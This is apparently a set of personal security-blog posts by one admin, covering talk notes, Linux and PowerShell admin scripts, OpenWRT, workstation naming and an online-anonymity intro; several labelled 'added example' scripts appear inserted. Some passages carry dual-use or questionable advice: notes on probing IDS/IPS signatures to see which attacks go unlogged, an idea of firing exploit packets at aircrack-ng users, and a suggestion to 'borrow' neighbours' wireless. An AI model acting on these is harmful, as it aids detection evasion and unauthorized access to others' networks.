    Hacker Potpourri - Simple Nomad.mp4 - Simple Nomad (old skewl) talks about some greylisting of spam mail, OS fingerprinting using PPTP, finding firewalling devices (using FIN flags, UDP port 0 packets, hop counting) and DVR hacking, but the real meat of this talk is about profiling IDS/IPS systems which starts at 32:45. You can use reverse-lookups to profile some IDS/IPS systems, the timing of reports, and whether admins are doing manual checks. Can fiddle with the DNS replies to profile the investigator some more. Abuse the signature sets to further narrow what IDS is in use or how they block things (vulnerability vs exploit). You can really do a lot of information gathering by knowing signatures for various IDS products and doing tests to see if your attacks are either blocked, allowed, or logged and then either manually or automatically investigated. Very cool.

    Extend Your Code Into the Real World - Ryan Clarke.mp4 - I really dig Clarke's enthusiasm and energy. I'd love to hang out with this guy and tinker with electronics and hardware on the weekends. His talk is a beginner blitz into hardware hacking. I consider this talk mandatory for any security or tech guys as Clarke really shows off where some things are going. Very exciting!

    When it comes to computers and "hacking" and electronics, I can't do everything despite my desires and best efforts, but for the things I'm not diving into at the time, I love talks like this because they can give me a nice taste of what I'm missing and keep me at a level that I could dive in if my life ever finds me in a place where I can do it (or have friends who do it that I can learn from).
    .: random notes on 2600, hacking exposed, orinoco atheros
    The latest 2600 is out. If you don't typically buy it or have the money, just sit down at the bookstore and flip through it and read what you want.

    I also see one of the books I've really wanted in the last year has been released. Hacking Exposed: Wireless is currently available and in an odd green color. Anyone aware why this one is green? I didn't pick it up long enough to find out why, but I'll be buying the book regardless.

    On the wireless front, I got my latest Orinoco wireless PCMCIA card on Friday and am very pleased with its performance. It is the Atheros chipset (8470-WD) which means it plays very nicely with BackTrack 2 and monitor mode. In fact, it plugs in and works just fine unless I've been juggling cards on that laptop and the last config still has a different card (my BackTrack is fully installed locally, so my settings are saved).
    .: wispy on linux
    So, a while back I got a Wi-Spy, which works great on Windows XP. I saw that there are some wispy tools for Linux, so I thought I would try them out on my Ubuntu laptop. I downloaded the files and extracted to /home/michael/wispy.
    michael@orion:/$ cd /home/michael/wispy
    michael@orion:~/wispy$ sudo apt-get install libusb-dev libncurses5-dev libgtk2.0-dev
    michael@orion:~/wispy$ ./configure
    michael@orion:~/wispy$ make
    michael@orion:~/wispy$ sudo ./wispy_gtk
    
    This worked out just fine (and yes, libgtk2.0-dev installed a ton of stuff), but the colors look horrid. The whole spectromap takes on this lemony-green color even when nothing much is happening. Very ugly, but then again, this is just a quick set of tools whipped together and really is no replacement for using Chanalyzer on Windows. Still, this is nice in case I ever do want to see what's going on and only have my Ubuntu with me.
    .: is there a reaction to security warnings
    I saw this quote today in some news that hit my rhetorical question button:
    The Ministry of National Defense located in Taipei has warned their personnel against cyber attack. Awareness at the user level is more important than ever after a recent discovery of an intelligence leak at the National Defense University.
    What would you do differently in your job if you received a warning from your boss or from upper management or the security team to be wary of cyberattacks? What will your own employees do differently? Will they even know what that means or what to even begin to do?

    I can imagine my mom getting that notice where she works and basically have zero change in behavior because it really means nothing to her (works in a hospital). Should she stop more strangers in the hallways and challenge for ID? Should she refrain from email communication? If the computer crashes unexpectedly, should she more quickly call up IT to report it and investigate?

    Does your security training equip employees to be able to process and respond to such a warning? Maybe the company shouldn't even give these warnings and instead only raise the warning level of technical/security staff? Did you send out a warning to employees the other week to be on the lookout for any ANI/cursor files sent via email or posted on websites? Does that really change anyone's behavior or do they just talk to their immediate peers about how stupid that email was for 5 minutes?
    .: powershell auditing permissions
    Auditing permissions on a Windows server is basically hellish unless you have a very strict policy on subfolder explicit permissions and group usage. You can use tools like CACLS.exe and XCACLS.exe, but for messy folder shares, the output can be utterly unmanageable. Enter a powershell script I wrote. This script takes a path as an argument and will dump out all explicit (non-inherited) permissions from the path and all subfolders inside it. Never make the mistake of re-pushing inheritance down on subfolders and wiping out all those restrictions again!

    $error.clear()
    # SilentlyContinue hides access-denied errors, so a folder this account cannot read
    # is simply skipped and produces no output; run it as an account that can read every ACL.
    $erroractionpreference = "SilentlyContinue"
    
    # Print every access rule on each folder that is NOT inherited from its parent.
    function GetExplicits ($folders)
    {
       foreach ($i in $folders)
       {
       $acllist = get-acl $i.fullname 
       foreach ($x in $acllist.Access)
          {
          If ($x.IsInherited -eq $false)
             {
             Write-Host "$($x.IdentityReference.Value) has $($x.FileSystemRights) on $($i.fullname)"
             $spacing = $true
             }	
          }
       # Blank line after a folder that had explicit entries, for readability.
       If ($spacing){ Write-Host "";$spacing=$null }
       }
    }
    
    If (-not $args[0]) { "usage: ./auditperms.ps1 <path>"; return }
    $strpath = $args[0]
    If (-not (test-path $strpath)) { "bad path, try again, cowboy!"; return }
    
    # The root of the tree first, then every subfolder (files are skipped).
    Write-Host "----------------------------------`nROOT FOLDER EXPLICITS"
    $folderslist = Get-Item -path $strpath
    GetExplicits $folderslist
    
    Write-Host "----------------------------------`nSUBFOLDER EXPLICITS"
    $folderslist = Get-ChildItem -path $strpath -recurse | where  {$_.psIscontainer -eq $true}
    GetExplicits $folderslist

    The output looks like this:
    ----------------------------------
    ROOT FOLDER EXPLICITS
    Everyone has Modify, Synchronize on \\fileserver\users\scanner
    CREATOR OWNER has Modify, Synchronize on \\fileserver\users\scanner
    BUILTIN\Administrators has Modify, Synchronize on \\fileserver\users\scanner
    MYDOMAIN\Domain Users has Modify, Synchronize on \\fileserver\users\scanner
    ----------------------------------
    SUBFOLDER EXPLICITS
    Everyone has ReadAndExecute, Synchronize on \\fileserver\users\scanner\FarmBanc
    
    Everyone has ReadAndExecute, Synchronize on \\fileserver\users\scanner\SalesApp
    
    Everyone has ReadAndExecute, Synchronize on \\fileserver\users\scanner\SalesApp\April Visit
    
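    The warning at the top of this post, about re-pushing inheritance and wiping restrictions, points at the two things the explicit-ACE dump does not call out directly: folders where inheritance has been disabled outright (a folder whose ACL is "protected" will lose every one of its rules if someone re-enables inheritance with "replace child permissions") and explicit Deny entries, which are the ones people most often rely on and most often lose. Here is an added example (my own script, not the post's auditperms.ps1) that reports just those folders; it assumes PowerShell 2.0 or later and reads the DirectorySecurity object that get-acl already returns.

```powershell
# Added example: list folders with inheritance disabled or explicit Deny ACEs.
# Assumes PowerShell 2.0+. Run as an account that can read every ACL in the tree.

function Get-ProtectedFolders {
    param([Parameter(Mandatory=$true)][string]$Path)

    # Root folder first, then every subfolder; unreadable branches are reported, not hidden.
    $folders = @(Get-Item -LiteralPath $Path) +
               @(Get-ChildItem -LiteralPath $Path -Recurse -ErrorAction SilentlyContinue |
                 Where-Object { $_.PSIsContainer })

    foreach ($f in $folders) {
        $acl = Get-Acl -Path $f.FullName -ErrorAction SilentlyContinue
        if (-not $acl) { Write-Warning "cannot read ACL on $($f.FullName)"; continue }

        # AreAccessRulesProtected is true when "inherit permissions from parent" is unchecked.
        $protected = $acl.AreAccessRulesProtected
        $denies = @($acl.Access | Where-Object {
            -not $_.IsInherited -and $_.AccessControlType -eq 'Deny' })

        if ($protected -or $denies.Count -gt 0) {
            New-Object PSObject -Property @{
                Path                = $f.FullName
                Owner               = $acl.Owner
                InheritanceDisabled = $protected
                ExplicitDeny        = ($denies | ForEach-Object {
                                          "$($_.IdentityReference) : $($_.FileSystemRights)" }) -join '; '
            }
        }
    }
}

# Usage: .\protectedfolders.ps1 \\fileserver\users\scanner
if (-not $args[0]) { "usage: ./protectedfolders.ps1 <path>"; return }
Get-ProtectedFolders -Path $args[0] |
    Format-Table -AutoSize Path, InheritanceDisabled, Owner, ExplicitDeny
```

    Keep the output from a known-good run; diffing it against a later run is the quickest way to spot that someone pushed inheritance down or that a Deny quietly vanished. The Owner column is worth a glance too, since the owner can rewrite the ACL regardless of what the ACEs say.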
    .: aircrack vulnerability allows a more bristly defense
    I see there is a vulnerability in aircrack-ng 0.7. While interesting in itself, this strikes an interesting chord.

    First, this means that widespread, fairly static distributions such as BackTrack 2 have a lot of users of their Linux livecd that will continue to run vulnerable versions of aircrack-ng. That's a bit of concern, or should be, for anyone who uses that distro. Granted, the chances of someone attacking their box with this vuln are downright slim, but unless you roll your own BackTrack, do a full local install to update aircrack-ng, or patch aircrack-ng on the fly, you're kinda stuck with this issue.

    Second, I really believe someday I will have enough time on my hands to have a more bristly defense posture on my networks. In this case, I could have not only an IDS on my wireless network, but I could actually regularly send out packets crafted for just this vulnerability. Anyone leveraging aircrack-ng 0.7 (or BackTrack2) against my wireless network might be in for a brief surprise and could give me additional information or warning about maldoers. Rather than just a fence around the grounds, it can be highly electrified as well.

    With a lot of vulns like this, it might not make sense to send out traffic for it because you never know if people will still be using it, and the chance gets slimmer as time goes on. But BackTrack 2 is pretty static for a lot of users who never change anything and may be using this distro until a major update comes out.
    .: dungeons and dragons and networks
    This editorial on Dungeons & Dragons & Networks talks about how the boundaries present in both network troubleshooting and the D&D play format promote creativity, while tasks with less boundaries are more difficult.
    If people performed preventative maintenance and worked to improve their network, they'd have fewer problems to address in the first place. But because individual problems provide intellectual boundaries and present obstacles to overcome, it is simply a much, much easier task than trying to look at the vast possibilities inherent in the network and try to come up with a vision rather than a solution.
    I think there is a lot of truth in that, especially since us IT types tend to be problem-solvers a little more than we are visionaries. I think management (and IT staff ourselves!) can benefit from recognizing initiatives that might be more successful when more properly bounded. I am guessing that many managers and project managers likely know this principle already, but it can definitely help us techs when we're not being led very much in between fires. (Article found through WhiteDust)
    .: openwrt
    Played briefly with OpenWRT this weekend. I have an extra Linksys WRT54G (v2.2) WAP and I loaded up the appropriate OpenWRT firmware. OpenWRT unexpectedly imported all my previous settings from the Linksys default firmware, so I didn't really have to do much besides plug in cables.

    It should be noted that while Linksys products are administered by the web interface, OpenWRT's web interface is really only useful to see some status information, set very general settings, and view the list of installed and available packages. Everything else should be done via an SSH connection. Set the login password in the web interface while there. This not only sets the web interface password, but also turns off telnet and enables ssh. Remember that you are essentially SSHing into a Linux box, so you SSH as root (ssh root@192.168.20.1). Hopefully through the week I'll look into playing with this box a bit more.
    .: we have to make mistakes
    Security and IT are tough these days. While we keep getting an influx of people with their MCSE and A+ certs that can do fun things with desktop support, it is all those other more specific areas of IT that still are not getting the love they should be getting. Maybe it is because they're a layer or two out of the eyes of most normal users (and managers). Too often, us techs can do a lot of good things, but sometimes don't get a chance to try things out when we're already swamped with an overload of work, not enough money, and too many fires to put out.

    Mark Curphey has been posting his experiences with his new start-up lately. While a lot of the content is not terribly pertinent to me at this point, I do enjoy reading him. Tech-to-tech, this paragraph really caught my eye:
    Did I really transfer the domain to my account or was this someone snarfing my domain and my religious spam rules means I missed a very important mail? Alex was sat at his desk dreaming in code but saw I was panicking. We looked at it and pulled up the whois records. Holy bull-shitake batman, some bastardo has snarfed my domain and the records show dummy, dummy, dummy as the new owner. We googled and others had been conned by the same trick. How could this happen? How could Gandi let someone transfer a domain without positive acknowledgement. Oh crikey, I really screwed up by being strict on spam.
    Considering the theme of this post, I think it might be obvious what caught my attention. You can make an entire job out of being a spam admin or even a DNS/SSL/domain admin, even at smaller companies. But chances are, those tasks are only a very small (disturbingly tiny) part of our jobs. How can you get to be a spam surgeon? Do you have time to pick through what gets caught in the filters? Do you have time to even tune up the filters at all while maintaining high functionality for possibly critical emails? Just how are you tracking all your DNS and SSL purchases and expirations?

    That's tough, and I think unless you can acquire these skills somewhere or have a job that lets you have a lot of bandwidth to research and tinker with such things, outsourcing to a company that can focus on just that one thing is still a big IT need. That or understanding what techs need to ultimately be successful. Can you really maintain a spam filter effectively, or would it be more efficient to outsource to a company that specializes in spam filtering?

    That is one area I think still needs work in the "business and IT must work better together" agenda. We don't know everything in IT and we really do have to make mistakes. I've learned that you learn the most about technology during the troubleshooting stage as opposed to when everything is going right. Business is not terribly forgiving about such things, even if they are small but visible incidents in the whole scheme of things. Business wants to make a request, have it implemented perfectly, and then run unattended for 25 years without any further investment. IT knows better and that any new technology not only must be learned, monitored, and administered, but at some point does need to be evaluated for security, efficiency, and proper improvement.
    .: disable firefox referer option
    This is pretty low-skill, but useful. If you want to stop Firefox from sending Referer headers when you click links to other locations, type about:config in the address bar and change the network.http.sendRefererHeader option to value 0.
    .: naming workstations
    I just read Naming Workstations on a Windows Network and had to smile a bit. Something as simple as your workstation naming scheme can be a very complex process that is different for every single network from 10 users to 10,000. It just goes to show how varied our field is and how many different ways and opinions there can be.

    My current job names workstations by OS and username. I dislike this scheme. At my old job early on I inherited and used a similar method where I named the workstations after the usernames. We had a smaller company of only about 60 users, and by the time we grew up to 150, we had had a security audit which pointed out that machines named in such a way leaked too much information (Low priority, I believe). Wanted to target the CFO? Find his name, enumerate the network, and you likely also have a username that has rights on that machine.

    I switched us over to naming machines "wkst###" and maintained both an Excel spreadsheet mapping workstation name to the user assigned that computer (we checked out equipment to all employees) and also inventory management software which let me regularly map MAC, IP, usernames, and workstation names together. This way if "WKST125" was doing something naughty, I could very quickly isolate it, take control, and/or check on the user. Having administrative access on switches and remote control capabilities takes away a lot of the need for user-named or even departmental-named workstations when you have an inventory of MACs and domain admin rights! I never did reuse names either, and I had a strict personal policy that no machine was re-issued without first wiping and re-imaging it (sadly, some colleagues did not adhere to such policy later on), thus a perfect opportunity to rename it. I might leave orphaned entries and artifacts this way, but I would rather have orphaned data than data that might actively be lying to me if it wasn't kept up to date.
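    As an added example (not from the post), here is a small shell/awk audit over an inventory in the form the post describes (workstation name, assigned user, MAC, IP). It flags the two problems discussed: hostnames that embed the assigned username, and hostnames or MACs recorded more than once. The CSV layout and all sample rows are constructed.

```shell
#!/bin/sh
# Added example, not from the post. Audits an inventory CSV of the kind the post keeps
# (hostname,username,mac,ip) for the issues discussed: hostnames that embed the assigned
# user's name (the finding from the post's security audit) and hostnames or MACs recorded
# more than once (the stale-data problem a never-reuse-names policy is meant to avoid).
set -eu

# Constructed sample inventory (assumed format: hostname,username,mac,ip; first line is a header).
SAMPLE_INVENTORY='hostname,username,mac,ip
wkst101,jsmith,00:11:22:33:44:01,10.1.1.101
wkst102,acfo,00:11:22:33:44:02,10.1.1.102
xp-acfo,acfo,00:11:22:33:44:03,10.1.1.103
JSMITH-PC,jsmith,00:11:22:33:44:04,10.1.1.104
wkst105,mlee,00:11:22:33:44:05,10.1.1.105
wkst101,tnguyen,00:11:22:33:44:06,10.1.1.106
wkst107,pkim,00:11:22:33:44:05,10.1.1.107'

# Read the inventory from stdin and print one finding per line:
#   LEAK <host> <user>      hostname contains the assigned username (case-insensitive)
#   DUPHOST <host> <n>      hostname recorded n>1 times
#   DUPMAC <mac> <n>        MAC recorded n>1 times
# Exit status 0 if there are no findings, 1 otherwise.
audit_inventory() {
    awk -F, '
        NR == 1 { next }                      # skip the header row
        {
            host = $1; user = $2; mac = $3
            if (user != "" && index(tolower(host), tolower(user)) > 0) {
                print "LEAK " host " " user; findings++
            }
            hosts[host]++; macs[mac]++
        }
        END {
            for (h in hosts) if (hosts[h] > 1) { print "DUPHOST " h " " hosts[h]; findings++ }
            for (m in macs)  if (macs[m]  > 1) { print "DUPMAC "  m " " macs[m];  findings++ }
            if (findings) exit 1
            exit 0
        }'
}

# Run the audit over the embedded sample; returns awk's status.
audit_sample() {
    printf '%s\n' "$SAMPLE_INVENTORY" | audit_inventory
}
```

Against the sample, the audit reports the two user-named machines, the reused name wkst101 and the MAC recorded twice.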
    .: keystroke biometrics
    Keystroke mechanics keep being talked about as a form of biometric identification. I'm still skeptical because of how variable this can be...

    I live in Iowa which means we have some pretty cold winters. I certainly do type differently if I have cold fingers.

    I also type vastly differently depending on my level of inebriation (of course, this can cause regular typos in passwords anyway...)

    I type differently depending on my position and mood and keyboard and life. I type far differently now than I did 5 years ago, for instance. Sometimes I am in thought and might type differently, especially on some sort of password screen.

    Do I think people's typing differs enough to tell who they are with an acceptable level of accuracy? Personally, I doubt it...
    .: striving towards management by fact
    Richard's post about monitoring and "management by fact" got me thinking about security for the real world admin. What is the best sort of server to monitor? That's easy, the server that requires the least changes. If you stand up a server and don't need to do anything beyond patches and application-level updates (for a DNS server, adding DNS records...), monitoring that box becomes amazingly easy and informative.

    You can quickly tell when something is wrong. Besides, a typical early step in troubleshooting (and it is part of Cisco's troubleshooting methodology) is to ask, "What changed?" This is something really near and dear to my heart, since I used to be pretty heavy into sciences back in college: observable changes causing observable results. If something weird happens, figure out what the one-off is that caused it.

    There are really two problems in business that fight a never-ending battle against the unchanging server.

    First, the technical ability of the admin is crucial. Take a new DNS admin tasked with standing up a DNS server. It might not take long to get the DNS server up and running, but to get it tuned for performance and security may take weeks, months, even years of small changes, mistakes, and troubleshooting. For an expert, experienced DNS admin, this "time to stable" is far shorter and much more assured. This is partly why we need more experts (training) in the back rooms of IT, the luxury of making mistakes to become experts, and time to do proper research so we can be empowered to do more initiatives outside of our comfort zones (otherwise we just say, "no").

    Second, business sometimes likes to cut corners, especially with money and especially with IT infrastructure. If a server isn't choking, it must have room to put more on it, right? This defeats trying to efficiently "manage by fact" in the IT back rooms. If you have an SBS box that does basically everything that can be crammed into it, the constant flux of use and changes can make creating a baseline and monitoring for oddities frustrating.

    I love the idea of managing by fact, and I think for most of security, that should be the goal to someday reach.
    .: remoting into headless ubuntu box
    Yeah, I know, back to basics with Ubuntu. This took me longer than it ever should have, so I'm just posting my travails here. I wanted to make my Ubuntu server essentially headless where I don't have a keyboard, mouse, or monitor hooked up to it. Obviously this means remote desktop capabilities.

    Sadly, the obvious and most often-used tools to accomplish this either require me to remote logon with my Ubuntu laptop (yuck!) or require a session to already be logged on the server locally (yuck!). Well, I want to be able to remote in, even at the logon window after a reboot! Here are my steps.
    sudo apt-get install x11vnc vnc-common
    sudo x11vnc -storepasswd password /etc/x11vnc.pass
    sudo gedit /etc/X11/gdm/Init/Default
    add this at the bottom just above exit 0:
    /usr/bin/x11vnc -rfbauth /etc/x11vnc.pass -o /tmp/x11vnc.log -forever -bg -rfbport 5900
    sudo gedit /etc/X11/gdm/gdm.conf
    change #KillInitClients=true to KillInitClients=false
    reboot
    I'll probably end up changing this all up once I decide to wrap this inside SSH, but since this will always be local (unless I VPN in remotely), I'm not as concerned about this setup. I might just tunnel it through SSH just to make sure I can do so with this setup.
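    As an added example (not the post's own steps), this POSIX shell script makes the same two gdm edits but with x11vnc told to listen on the loopback interface only, so the VNC session is reachable solely through the SSH tunnel mentioned above. Paths and flags are those from the post plus x11vnc's standard -localhost option; the listening-socket check assumes "address:port" lines as printed by ss -ltn.

```shell
#!/bin/sh
# Added example: automates the post's gdm edits, but binds x11vnc to localhost so the
# only way in is an SSH tunnel. Paths/flags are the post's; -localhost is a standard
# x11vnc option. From the laptop, open the tunnel and point the VNC viewer at localhost:5900:
#   ssh -L 5900:127.0.0.1:5900 user@server
set -eu

X11VNC_PASS=/etc/x11vnc.pass
X11VNC_LOG=/tmp/x11vnc.log
VNC_PORT=5900

# The line to run from gdm's Init script: the post's command line plus -localhost.
x11vnc_init_line() {
    printf '/usr/bin/x11vnc -rfbauth %s -o %s -forever -bg -localhost -rfbport %s\n' \
        "$X11VNC_PASS" "$X11VNC_LOG" "$VNC_PORT"
}

# Insert the x11vnc line just above the final 'exit 0' of $1 (e.g. /etc/X11/gdm/Init/Default).
# Idempotent: a second run leaves the file unchanged. Without an 'exit 0' the line is appended.
# The result is copied back with cat so the script keeps its executable mode.
install_init_line() {
    script=$1
    line=$(x11vnc_init_line)
    grep -qxF "$line" "$script" && return 0
    awk -v line="$line" '
        { buf[NR] = $0 }
        END {
            last = 0
            for (i = NR; i >= 1; i--) if (buf[i] ~ /^[[:space:]]*exit 0[[:space:]]*$/) { last = i; break }
            for (i = 1; i <= NR; i++) { if (i == last) print line; print buf[i] }
            if (last == 0) print line
        }' "$script" > "$script.tmp" && cat "$script.tmp" > "$script" && rm -f "$script.tmp"
}

# Turn the commented-out default '#KillInitClients=true' (or an explicit true) into false
# in $1 (e.g. /etc/X11/gdm/gdm.conf) so gdm leaves the Init-started x11vnc running.
set_keep_init_clients() {
    conf=$1
    sed 's/^#\{0,1\}KillInitClients=true$/KillInitClients=false/' "$conf" > "$conf.tmp" \
        && cat "$conf.tmp" > "$conf" && rm -f "$conf.tmp"
}

# Read listening sockets as "addr:port" lines from stdin and return 0 only if the VNC
# port is bound to a loopback address and nowhere else. After a reboot, run e.g.
#   ss -ltn | awk 'NR>1 {print $4}' | vnc_loopback_only && echo "VNC is local-only"
vnc_loopback_only() {
    awk -v port="$VNC_PORT" '
        {
            n = split($0, a, ":"); p = a[n]
            addr = substr($0, 1, length($0) - length(p) - 1)   # everything before the last colon
            if (p != port) next
            seen = 1
            if (addr != "127.0.0.1" && addr != "[::1]" && addr != "::1") bad = 1
        }
        END { if (seen && !bad) exit 0; exit 1 }'
}
```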
    .: more linux basics - the sleep timer
    I dig somafm, particularly the Groove Salad station. Sometimes I get into a nice chilled state of mind at night and would love to fall asleep to some cool grooves, but don't want XMMS (my mp3 player) to run all night long. Well, I can do this easily in a terminal shell by first finding the pid of XMMS and then using the sleep command. Elegance in simplicity.
    michael@orion:~$ ps ax | grep xmms
    29540 ?        SLl    0:20 /usr/bin/xmms /tmp/groovesalad.pls
    30511 pts/0    R+     0:00 grep xmms
    michael@orion:~$ sleep 1200; kill 29540
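    As an added example (not from the post), the same sleep-then-kill idea with two checks a practitioner would want: pgrep -x instead of ps | grep (so the grep line cannot match itself), and a check before killing that the PID still belongs to the same program, since over a 20-minute sleep the player may have exited and the kernel may have handed its PID to an unrelated process. Process names are read with ps, falling back to /proc on Linux.

```shell
#!/bin/sh
# Added example, not from the post: "sleep 1200; kill <pid>" with a PID-reuse check.
set -eu

# Print the current program name of PID $1, or nothing if it no longer exists.
# Uses ps -o comm=, with /proc/<pid>/comm as a Linux fallback.
comm_of() {
    { ps -o comm= -p "$1" 2>/dev/null || cat "/proc/$1/comm" 2>/dev/null || true; } \
        | awk '{ print $1; exit }'
}

# Wait $1 seconds, then send SIGTERM to PID $2 only if it is still running program $3.
# Returns 0 if the signal was sent, 1 if the PID is gone or now belongs to something else.
kill_after() {
    secs=$1; pid=$2; name=$3
    sleep "$secs"
    comm=$(comm_of "$pid")
    if [ "$comm" = "$name" ]; then
        kill "$pid"
        return 0
    fi
    echo "PID $pid is no longer $name (now '${comm:-gone}'), not killing" >&2
    return 1
}

# The post's use case (constructed): stop xmms twenty minutes from now.
#   kill_after 1200 "$(pgrep -x xmms)" xmms
```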
    
    .: stop ruining it for the rest of us!
    If stories like this keep appearing, IT is going to continue to become much more complicated...
    Denison first attempted a remote attack against the ISO data centre on Sunday, but this was unsuccessful. He then reverted to simpler means, and entered the facility physically using his security card key late on Sunday night. Once inside, he smashed the glass plate covering an emergency power cut-off, shutting down much of the data centre through the early hours of Monday morning. This denied ISO access to the energy trading market, but didn't affect the transmission grid directly. Nor did his emailed bomb threat, delivered later on Monday, though it did lead to the ISO offices being evacuated and control passed to a different facility.
    .: high-end insecurity: RFID and LCD
    Looks like you can recreate images on LCD screens remotely. I'm not sure how it works with moving images, but this is pretty high-end if you ask me. It is interesting to hear that NATO spent a lot of money to protect against a similar attack against CRTs. And also RFIDs are still being talked about for their flaws and the paranoia behind them.

    One of my big things is how our security, laws, and entire culture have changed due to how efficient the digital world has become. Music has always been pirated, only now it can be done on massive scales. In the past, things like RFID and LCD eavesdropping were really only issues for extremely high-end governments and corporations. No one else cared, had threats that had these capabilities, had the assets valuable enough to protect to justify the cost, nor had the money to afford it anyway. We're talking huge companies, governments, and military, and even just subsets of those.

    But these days, things like this can become a reality for more people. RFID might be something we have in all our pets soon, cars, electronics, maybe even ourselves. LCD eavesdropping is still a bit exotic, but if it really is as easy as it seems, this could become a backroom concern for corporate espionage or even internal investigations. Can you imagine being assigned the task of sitting in a conference room and recording images on the screen of a VP two offices away as part of an internal investigation in addition to network and disk forensics? Could you maybe drop a magnetized object on the back of the monitor which automatically logs all the images much like a keylogger? What about the potential range of such eavesdropping? Can it be thwarted fully by focusing on the physical security angle or will LCDs be obsolete in 7 years just like CRTs are now, thus the vulnerability will slowly ebb away?

    Some interesting thoughts...
    .: feisty ubuntu server tutorial
    Adnan posted about a Rootprompt post pointing to this Ubuntu server installation tutorial on Feisty Fawn. The tutorial is aimed at installing services that an ISP would need: SSH, BIND, MySQL, SMTP-AUTH/TLS, Courier-IMAP/POP3, Apache/PHP5, ProFTPD, ISPConfig. Not necessarily all stuff I need, but for some of it I do like to read up on how other people do these.

    I like this tutorial and I don't like this tutorial. For starters, the tutorial is one of those things that says, "To install XYZ, run this command and move on." It really offers little ability to deeply understand what you're doing and what nuances your particular needs or security posture might dictate. When you install the SSH server, did you disallow remote root login? When you're done with this tutorial, do you set su/sudo behavior back to the default? Does MySQL or Apache run on its own account, and can those accounts be logged into via SSH? The tutorial is great as an example of how easy it can be to install these services, but does nothing to warn users about the level of care and attention that might be needed to make sure it is running securely and efficiently. Did you follow this tut and leave your balls out on the Internet to be tickled and kicked or did you slip a cup on when no one was looking?

    However, I do like tuts like this where sometimes the service you want to install seems daunting for no real reason other than fear of the unknown. I've worked with BIND in the past and can edit my own zone files, but for some reason I have never actually stood up a BIND DNS server myself. Tuts like this can blitz you through the unknown and get you going. You can't learn to whitewater raft by watching from the bluffs. Get the hell in the water, capsize yourself, and get wet!
    .: re: management by fact
    I had a post a few days ago about managing by fact, to which Alex responded rather appropriately by saying "fact" is a bit of a strong and strict word. We can manage by belief, but our beliefs need to be backed by observable evidence, reason, and facts (yes, I'm rewording). He's right and I have a belief that we both agree on this topic quite nicely. :)
    .: staying anonymous - part 1 intro
    So you want to interact with the less "white hat" types of security professionals but you don't want to hang your balls out there and allow people to track back to you? Looking to not put your name which might be attached to your company into the limelight if you just happen to get noticed and on the wrong side of some punk kid who decides to have some fun at the possible expense of your career? Or you are just a rightfully paranoid security guy looking to rub shoulders and learn new things without the possible collateral damage of having to defend your own network at home? Well, here are some tips on staying anonymous online.

    For this series of posts, I will try not to get fancy and technically challenging. I know you can leverage even better means of anonymity online by routing through SSH connections and shells, scrubbing packets and information, "borrowing" other computers in disparate parts of the world and using them to bounce your connections, or fancy P2P nets and encryption. Some of that is just not as practical for quick approaches. Of note, not all of the stuff mentioned here is technically legal, although the illegality may still be pretty grey. Open mail relays, web proxies, and nearby wireless networks may not necessarily be freely open, so just be aware of that.

    Keep in mind that this guide is not meant to protect you if you want to do illegal and bad things. This guide is meant for non-criminals to add an extra layer or two of protection between yourself and other nosy persons. If you already live in the darker corners of the Internet, this guide will not give you any additional information. I also am not entirely encouraging people to push the lines of legality with some of these ideas and steps. Common sense is your friend.

    This series is not meant to protect your identity from credit card thieves or allow you to live out your life in places the IRS cannot find you. This is not about hiding your search queries in Google because you think they and the DHS are tracking you. This is simply about being anonymous on the Internet in regards to how other people find or interact with you and you with them.

    I'll start off with some ground rules.

    First, don't be stupid and immature and pick fights. What some newbies do in communities is pick fights and/or act stupid in an effort to quickly get noticed. This is not the way to go. If you have something useful and novel to offer the community, go for it. But most people new to these communities are better served by sitting back and offering tidbits and discussion as they have an opportunity to do so. Be positive, supportive, friendly, and outgoing when it appears to be welcomed. Learn the tone, the names, and what goes on. That's really the biggest bit of advice for interacting in a community outside the white hats and office cubicles: don't be a dumbass. And if someone pounces on you trying to be a pest, just let it slide. This isn't prison where you need to offer a beatdown to the first person who challenges you or forever be branded easy pickings.

    Second, pick a nickname (screen name, handle, nick...). If you want to maintain a distance between yourself and the community (which is sometimes prudent considering the curious nature of many crackers), you definitely need to not be known by your real name. Pick a nickname and stick to it. Better yet, pick a fully fake name. I go by Michael Dickey pretty much everywhere in life. But what if I picked Wally Harrison as my name online? I could hide in the noise of Google searches for other people. If you pick something really unique, you'll be a bit more easily searchable and one slip-up could ruin all of this work. Of course, don't pick a name that someone else is already using. Using StankDawg might not be kosher with StankDawg.

    Third, be aware that staying anonymous is a heck of a lot of work. It is not easy. The more you want to be involved and known, the more you will leak information and screw up. True, full anonymity is not easy at all; in fact, I couldn't do it, myself. And if you want to make a go of it, be prepared for hard work, lots of time spent troubleshooting your own tactics, and prepare for your failures and slip-ups. True anonymity might not mean making absolutely zero mistakes, but it should be your goal to never show up in any logs with data that might be tied to you. Be aware of your information.

    As a general rule, don't communicate or browse from home as much as is convenient to you. If you have nearby hotspots and open wireless, use them. If a neighbor has wireless, "borrow" their connection if you are feeling too paranoid (I didn't encourage that...right?).

    Lastly, as part of this series of posts (a first for me), I encourage feedback, both in the form of suggestions, corrections, or even challenges saying my advice is crap. And even if you aren't looking to be anonymous, at least be aware of the ways some of your own users might be trying to stay anonymous.
    .: the education-technology see-saw
    Andy ITGuy is a proponent of training, which is awesome and wholly commendable. I totally understand that, but I'm feeling picky today. Maybe today is Picky Wednesday, I dunno. But I noticed Andy posted this (he's going to love that I'm pulling out an anecdote and unfairly focusing on it, hehe) and I want to make a point too.
    My favorite quote from the post is this,

    "My dear friend, education is the key..not more locks and bolts."

    The same holds true for Information Security. If our users don't know how to spot and handle phishers then we might as well just put up an open WI-FI to our network and post it in the paper.
    I'm not sure I would say that user education is key and that without it we may as well put up open wifi. I think user education is very important, but it won't solve IT security any more than education has solved drug use, teen pregnancy, or STDs. I won't be able to dispense with logging utilities or AV or LUA or spam scrubbing just because I have a good training regimen.

    So yes, that's my point for the day. Security by technology and security by education need to be balanced just as much as security is balanced against usability. In the end, however, I'll take slightly more technology than education only because that is the one that can be auditable and has hard-drawn lines that I can trust (that and I likely have more budget right now than Andy might have...and that does matter).
    .: live-fire experience from cyber defense competitions
    Texas A&M has won the 2007 Collegiate Cyber Defense Competition. I really feel that live defense and attacking competitions help everyone involved, including spectators. Even if it is just amongst friends or at a con or even something as organized as collegiate level activity, this kind of live-fire stuff needs to grow and will continue to grow in popularity and exposure. If you get a chance to go to one of these events either as a participant or to hang out, I encourage you to go. Don't do like I did last year and skip out on a local CyberDefense competition for no real good reasons.
    .: snare and splunk logging
